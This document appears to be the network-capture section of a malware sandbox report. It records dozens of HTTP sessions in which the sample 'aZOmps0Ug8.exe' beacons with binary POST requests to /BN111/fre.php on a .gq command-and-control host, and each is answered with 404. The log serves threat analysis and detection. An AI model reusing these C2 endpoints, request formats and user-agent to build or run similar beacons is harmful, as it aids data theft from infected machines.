Oct 14, 2021 08:28:54.761792898 CEST	1126	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:54 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5iKke1AJBJjg1Y4VYs826dmfarUEhJ%2BRldRquW1kfSHN%2F9pyLtsyynuFr6yDn27OBJXeF7xvTdW%2Ft8i1FIp5x0Weuf1lZLtQZXeLjxSzbBGO%2FyFV1amXpr3qEg91BlnrsxMydhByRN7hHp%2FNzcUVzgokqELeaA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec0119f8505d0-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.6	49808	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:56.080095053 CEST	1127	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:56.196356058 CEST	1128	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:56 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7ZERCavJqd%2FSKMbfz%2FCdLS9YwGowXmP6tmsSmcJhamaT8Ait4OW44MSZPDPU0Da0xQWD1O7rujLd4vYbmYz9A17IY8%2BGwpvDcLDsDokZqYZuqyxlqEAsXlvosJbc66ZygTYhi55wxB4l2t2Jm5O0fXdSbA4yjg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec01a8bea1f31-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.6	49810	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:57.516459942 CEST	1131	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:57.630285978 CEST	1132	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O5KNJiSYA%2FFwVwmEIc9wb3cwwX%2FatGRb1JUO%2Bz%2BO1X6dOTVK5OasGDuojIDlalGExPnvGUgm4%2BBjy6wcTbge3HFAtucsxDcKdwQEvnp1sBeGdfQVSDQonetbCFSY%2BgvOrCkvkI7mREs82y4gLDOZB6jrrwpPJA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec0238f384df4-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.6	49811	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:58.883204937 CEST	1133	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:59.036413908 CEST	1134	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DM7UDqfrOC0u1TfBnQ6rtX30q18tMXbF5JIb91n%2BbGCB6ZdVbFXYS95wCnHdXiccXK3L6LtGQvYayuHRvdRXTsx%2Bp%2F8MP1IOTYSnqgQ1RzzD0YUpci6oZfH4e%2BVOk7%2BgeLA12NXL%2BrdcTTN7OA8MSANsnvfhKw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec02c0d56695b-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49782	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:22.592927933 CEST	1060	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:22.751913071 CEST	1061	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:22 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rIV1TCFtSps327NCu2VLT4v29yYPaf8k0h8mWGTLoJdR4ctIDPvXYKYGHAiiR70AaLpuz4o3vkmUXm72wLswxeU23M%2BVnkrC6oouZxiAyBfAU%2B7srHMGXyKvERWjs%2FICV8ZBHL3aKPib3xMytSdkecNOp%2BGqKQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69debf493e674e9d-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.6	49812	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:00.298238039 CEST	1135	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:00.410363913 CEST	1136	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6pzxxxAx7m5C%2BvI0HV9vpq2v%2FMh%2FQtCUhiuQVfVDamOYlWTH%2Fi66M79yyl7xYeat0IDW%2FErpRaBlSviuH6N5w1T51LJh6ilhSkpq5iiAXlGSkcN%2F0RFH%2B4gKfqMyKqrLMrZ%2F9KQlOg0PnfcEYBS9mMuv2oXUEw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec034ea085c38-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.6	49813	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:01.666924000 CEST	1137	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:01.827079058 CEST	1138	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RwxyEXrfJWD7HzQsJLaaJ4ykrDR%2FXfvMae8i0xj3UPR%2Bl89OWY%2FzFHl6zIsjt3MczmsMNyXqydAx4kl6J4imX5JAkkeop22%2Bp9dS34N1vYjp83Fzoam6oRK%2Bx64oqTTVoWsVbFiS6fNE%2F4OFRWqA4k1a9wK%2Feg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec03d7f2c3250-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.6	49814	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:03.076479912 CEST	1139	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:03.214101076 CEST	1140	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=91AmIffLnKe4Pbncz7KrUdCC7%2FIC1zkuoHQN1JfssoGk24gGXGVgK%2FfjSd%2BRFPNjQzfYkOwMtC%2FXqL%2BrxK2TSNEenBHg5Mzc%2Fbxkf4%2Fw%2FzewmKsOYKbBYCwux31XnGOv3FNqWKnELOMAweMsH1mdlUR0lqprnw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec0464cd51772-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.6	49815	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:06.184636116 CEST	1141	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:06.302758932 CEST	1142	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vcIT0xtrtdVqZu8AstBfvjAOVLZeU0jJkIg51LaEYzt2WcaP0aINNFdyPyzHGCi%2BFUn%2Bt9DitNetNAaC7a2WU1CkIz4esUAOdjvWe6RoWWH3jxFIhJPzOheLtuS4TLQLSt5M8LPLyDNCbhVFlEiI3yXDVeNVew%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec059aa9618e5-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.6	49816	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:07.530339003 CEST	1143	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:07.646630049 CEST	1144	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AsF%2F42rJeMS4o1jyaWpX5rcN1C7%2BwlYe9QyAvadZhUprUUDjjvl2mBaUHv2qSzvsM16RfVyDjciOwaQ0dYaMDLZXn9BBMNQ78ci9geDbIWxYBOq%2Ff7WlFnJZqgqdZEFqzws6tXcgPBAa0hiRMJyXMKzh%2BY5Kzw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec0621a7342f1-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.6	49817	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:08.722565889 CEST	1145	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:08.835047960 CEST	1146	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AETlKv0JLdUaJlMFIYw4c%2FUS3KY3jsZfqgBBcqkQPH7kBiRqISjQcPL9%2F6EycOt8Q0b%2BrCiBpVWf2JTuaTeRvPun%2BVdjS3dtjl0255v8MUhEF3A8ouzlFjwM9m5wMuIPxpMuRcbOokOsnygMEGf%2FVwZGMBD6qw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec0698d3268e5-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.6	49820	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:09.909565926 CEST	1225	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:10.033361912 CEST	1243	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=erKQyQL4NJDpVARn6gPTghRshW34aWgx999kFto0hxMgvDWKpjzkg8Ub9PghJyk1Z5TjvoNbgssstoLWvM30lY7gyqwlTQwOwpeLID12mO81PbUOzRbpTH9BULjM1lW%2FOKhQiir%2FSFqgaO1xg4olF%2FOm%2FEl05Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec070fbf74e98-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
37	192.168.2.6	49826	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:11.124121904 CEST	1373	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:11.252242088 CEST	1385	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FYS21KNhhPKeyLYemwqTO7CJfgOLB%2BcE8nmbaXZezuXpmbCfYbooJZGrTK1I2wCAIGGXi7Mmgbbcm9cTp0SlhyncjZPkn5v4lky0Kk4tKiYowD6Fp1RjLa2jaLWKfS7dODQ0ElVEAkA4Fmys4RO0oXOblnwXng%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec0788baf7049-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
38	192.168.2.6	49834	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:12.348795891 CEST	1557	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:12.488634109 CEST	1561	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B2qI3uPr1SHaFu9HAlyv12q%2Fhc2IMayWd%2Bj1fcV0AkZcaVue84gdm%2F7cQrR6vLY0VY7KYJBbWGLpWPtzrfM9eaBQPFNmCRI7TpAHhLrs47U15LbrrJR0WJX9Oc%2Bk59NVPnfHDIGNV6BI%2BfF99GVheeaXjWvcKA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec0803a323128-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.6	49843	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:13.657084942 CEST	1800	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:13.770459890 CEST	1840	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vLfAG7fmX6CyxJzEk0O%2FBmg16SmrBE5YBS%2BRqup8BBlwc6IKUiq47jBhstgYikzkzMesviFQn6p1zW4GFv1I33WYuGftqKKV0g1GwmVoOI9dfpmoaBmAp7BfaYYlwjL6gInDoblSgql%2F6c1Q%2FtwThQC5OxPEAg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec088686f5c38-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49783	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:28:23.792481899 CEST	1062	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:28:23.945936918 CEST	1063	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:28:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5wgGIaVyqpazjweKVSLXwiCkN75Ifsmvy1yNZb2HaTGFvj97QAK7byh9rdPZijXBS8IE2ZBG%2FYRIB4fcQZc0542rQ1bDIXwKO%2FyT7rfH3BOzsIfhWyfBIdPcSEdN3h0udKSLVpVjCxXslaXSnf%2Bcj8Aw4JtpmA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69debf50b8e24de8-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.6	49853	172.67.219.104	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:15.138021946 CEST	2098	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:15.258631945 CEST	2100	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vIoJjlpOUB4ch8A9vB%2FKQqgVGqG%2FBMM%2BfQzehosuEFSNQFo0gE9WIhQc2ZWAsVfi803z79IZC7COD7vw7q3ZvK9f7Lpn0xBwaC95bSAWCuYNsNId8NhJwwCkVxQHYxnxd4FRF8MJkTCEfItWcIZzhdJYp6PXZw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec091ad1b4aaa-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.6	49860	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:16.658468008 CEST	2114	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
Oct 14, 2021 08:29:16.772655964 CEST	2116	IN	HTTP/1.1 404 Not Found Date: Thu, 14 Oct 2021 06:29:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B6WLQ0YL6zFlWhHgnt6U6cMjNqhg5htzjtx%2FJ7jjaqAcyvmGs5vvqQFzydOJ0caWu3xNVdyUaeMy0GV8mS37gvIqcjdOZZ0esg5rlfOM%2FG%2FhL%2Bsg9F9ZhQbRtpEBXBQq5liRP8vYQAFgvHT%2FvZ5gZZtn75E7xw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 69dec09b293e5be5-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.6	49863	104.21.62.32	80	C:\Users\user\Desktop\aZOmps0Ug8.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:29:18.009855986 CEST	2121	OUT	POST /BN111/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 74f26d34ffff049368a6cff8812f86ee.gq Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4173EBC Content-Length: 169 Connection: close
